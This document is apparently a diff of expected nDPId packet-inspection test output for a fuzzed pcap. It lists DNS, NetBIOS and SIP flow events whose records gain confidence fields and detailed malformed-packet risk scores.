+00788{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":503,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120470775049,"flow_last_seen":1120470779408,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":188,"flow_avg_l4_payload_len":47,"midstream":0,"ts_msec":1120470779408,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2795,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"sip.cybercity.dk","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"212.242.33.35"}}
 00559{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":504,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":186,"flow_packet_id":3,"flow_last_seen":1120470779409,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":128,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":128,"pkt_l4_len":94,"ts_msec":1120470779409,"pkt":"ACjtAW69ADBUADRWCABFAAByAABAAEARtyfAqAEBwKgBAgA1CuoAXlCmXO6BgAABAAEAAgAAA3NpcAljeWJlcmNpdHkCZGsAAAECAcAMAAEAAQAAASwABNTyISPAEAACAAEAAAEsAAYDbnMywBDAEAACAAEAAAEsAAYDbnMxwBA="}
-00762{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":504,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":186,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470775129,"flow_last_seen":1120470779409,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1120470779409,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2794,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"sip.cybercity.dk","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"212.242.33.35"}}
+00788{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":504,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":186,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470775129,"flow_last_seen":1120470779409,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1120470779409,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2794,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"sip.cybercity.dk","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"212.242.33.35"}}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":505,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":187,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470779487,"flow_last_seen":1120470779487,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470779487,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2796,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":505,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":187,"flow_packet_id":1,"flow_last_seen":1120470779487,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120470779487,"pkt":"ADBUADRWAODtAW69CABFAABIa5kAAIARS7jAqAECwKgBAQrsADUANNbHUxEBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AkFrAAAhAAE="}
-00758{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":505,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":187,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470779487,"flow_last_seen":1120470779487,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470779487,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2796,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.ak","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":505,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":187,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470779487,"flow_last_seen":1120470779487,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470779487,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2796,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.ak","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":506,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":187,"flow_packet_id":2,"flow_last_seen":1120470780685,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120470780685,"pkt":"ADBUADRWAODtAW69CABFAABIa5oAAIARS7fAqAECwKgBAQrsADUANNbHUxEBAAABrQAAAAAABDtzaXAEX3VkcANzaXAJqqqqqqqqqqqqqqqqqqqqqqo="}
-00768{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":506,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":187,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470779487,"flow_last_seen":1120470780685,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470780685,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2796,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17":"Malformed packet"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00875{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":506,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":187,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470779487,"flow_last_seen":1120470780685,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470780685,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2796,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":508,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":188,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470781608,"flow_last_seen":1120470781608,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120470781608,"l3_proto":"ip4","src_ip":"192.168.170.170","dst_ip":"170.170.170.170","src_port":43690,"dst_port":43690,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00517{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":508,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":188,"flow_packet_id":1,"flow_last_seen":1120470781608,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"ts_msec":1120470781608,"pkt":"\/\/\/\/\/\/\/\/AODtAW69CABFAABOa5wAAIARSrHAqKqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="}
 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":510,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":187,"flow_packet_id":3,"flow_last_seen":1120470782692,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120470782692,"pkt":"ADBUADRWAODtAW69CABFAABIa54AAIARS7PAqAECwKgBAQrsADUANNbHUxEBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
-00806{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":510,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":187,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470779487,"flow_last_seen":1120470782692,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470782692,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2796,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17":"Malformed packet"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00913{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":510,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":187,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470779487,"flow_last_seen":1120470782692,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470782692,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2796,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00406{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":511,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"ts_msec":1120470784796,"pkt":"ADBUADRWAODtAW69CABFAAB6a58AAIARS7LAqAECwKgBAQrsADUANNbHUxEBAAABAAAAAAAAJF9zaXAEX3VkcANzaXAJeXliZXJjaXR5AmRrAAAhAAE="}
 00199{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":511,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":52}
 00566{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":512,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470187656,"flow_last_seen":1120470187656,"flow_idle_time":600000,"flow_min_l4_payload_len":71,"flow_max_l4_payload_len":71,"flow_tot_l4_payload_len":71,"flow_avg_l4_payload_len":71,"midstream":0,"ts_msec":1120470788806,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","l4_proto":37,"ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00551{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":512,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470187656,"flow_last_seen":1120470187656,"flow_idle_time":600000,"flow_min_l4_payload_len":71,"flow_max_l4_payload_len":71,"flow_tot_l4_payload_len":71,"flow_avg_l4_payload_len":71,"midstream":0,"ts_msec":1120470788806,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","l4_proto":37,"flow_datalink":1,"flow_max_packets":3}
-00661{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":512,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":180,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470685610,"flow_last_seen":1120470685610,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120470788806,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"200.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
+00687{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":512,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":180,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470685610,"flow_last_seen":1120470685610,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120470788806,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"200.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":512,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":189,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470788806,"flow_last_seen":1120470788806,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470788806,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.129","src_port":2796,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":512,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":189,"flow_packet_id":1,"flow_last_seen":1120470788806,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120470788806,"pkt":"ADBUADRWAODtAW69CABFAABIa6AAAIARS7HAqAECwKgBgQrsADUANNbHUxEBAAABAACqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="}
-00761{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":512,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":189,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470788806,"flow_last_seen":1120470788806,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470788806,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.129","src_port":2796,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17":"Malformed packet"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":0,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00868{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":512,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":189,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470788806,"flow_last_seen":1120470788806,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470788806,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.129","src_port":2796,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":0,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":513,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470796801,"flow_last_seen":1120470796801,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120470796801,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2797,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":513,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":190,"flow_packet_id":1,"flow_last_seen":1120470796801,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"ts_msec":1120470796801,"pkt":"ADBUADRWAODtAW69CABFAABEa6EAAIARS7TAqAECwKgBAQrtADUAMFm\/yxIAAAABAAAAQAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycFwAAAwAAQ=="}
-00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":513,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470796801,"flow_last_seen":1120470796801,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120470796801,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2797,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arp_","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00780{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":513,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470796801,"flow_last_seen":1120470796801,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120470796801,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2797,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arp_","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00527{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":514,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":190,"flow_packet_id":2,"flow_last_seen":1120470796802,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"ts_msec":1120470796802,"pkt":"AODtAW69ADBUADRWCABFiQBbAABAAEARtz7AqAEBwKgBAgA1Cu0ARzw7yxKAAAABAAEAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAcAMAAwAAQAAJxAACwlsb2NhbGhvc3QA"}
-00764{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":514,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470796801,"flow_last_seen":1120470796802,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1120470796802,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2797,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":12,"rsp_type":12,"rsp_addr":"0.0.0.0"}}
+00790{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":514,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470796801,"flow_last_seen":1120470796802,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1120470796802,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2797,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":12,"rsp_type":12,"rsp_addr":"0.0.0.0"}}
 00972{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":515,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":508,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":508,"pkt_l4_len":0,"ts_msec":1120470796804,"pkt":"ADBUADRWAODtAW69CABFAKqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="}
 00200{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":515,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":474}
 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":516,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470796941,"flow_last_seen":1120470796941,"flow_idle_time":180000,"flow_min_l4_payload_len":482,"flow_max_l4_payload_len":482,"flow_tot_l4_payload_len":482,"flow_avg_l4_payload_len":482,"midstream":0,"ts_msec":1120470796941,"l3_proto":"ip4","src_ip":"212.242.33.35","dst_ip":"192.168.1.2","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01089{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":516,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":191,"flow_packet_id":1,"flow_last_seen":1120470796941,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":524,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":524,"pkt_l4_len":490,"ts_msec":1120470796941,"pkt":"AODtAW69ADBUADRWCABFAAH+AABAADcRii\/U8iEjwKgBAhPEE8QB6uoyU0lQLzIuMCA0MDEgVW5hdXRob3JpemVkDQpDYWxsLUlEOiAyOTg1ODE0Ny00NjViMDc1MkAyOTg1ODA1MS00NjViMDdiMg0KQ1NlcTogMSBSRUdJU1RFUg0KRnJvbTogPHNpcDozNTEwNDcyM0BzaXAuY3liZXJjaXR5LmRrPjt0YWc9MWI4OWJjZA0KVG86IDxzaXA6MzUxMDQ3MjNAc2lwLmN5YmVyY2l0eS5kaz47dGFnPTAwLTA0MDcyLTE3MDFiOTQxLTc3OTk0NTg0Mw0iVmlhOiBTSVAvMi4wL1VEUCAxOTIuMTY4LjEuMjtyZWNlaXZlZD04MC4yMzAuMjE5LjcwO3Jwb3J0PTUwNjA7YnJhbmPYPWM5aEc0YktucCVzADc0Njg2LTQ1NWRiYmQ5MTkyLjE2OC4xLjINCldXYy1BdXRoZW50aWNhdGU6IERpZ2VzdCByZWFsbT0ic2lwLmN5YmVyY2l0eS5kayIsbm9uY2U9IjE3MDFiOTMzM2U4NzEzMmUxZjc0N2M1MDcyNjNkOTMiLG9wYXF1ZT0iMTcwMWExMzUxZjcwNzk1IixzdGFsZT1mYWxzZSxhbGdvcml0aG09TUQ1DQpDb250ZW50LUxlbmd0aDogMA0KDQo="}
-00620{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":516,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470796941,"flow_last_seen":1120470796941,"flow_idle_time":180000,"flow_min_l4_payload_len":482,"flow_max_l4_payload_len":482,"flow_tot_l4_payload_len":482,"flow_avg_l4_payload_len":482,"midstream":0,"ts_msec":1120470796941,"l3_proto":"ip4","src_ip":"212.242.33.35","dst_ip":"192.168.1.2","src_port":5060,"dst_port":5060,"l4_proto":"udp","ndpi": {"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
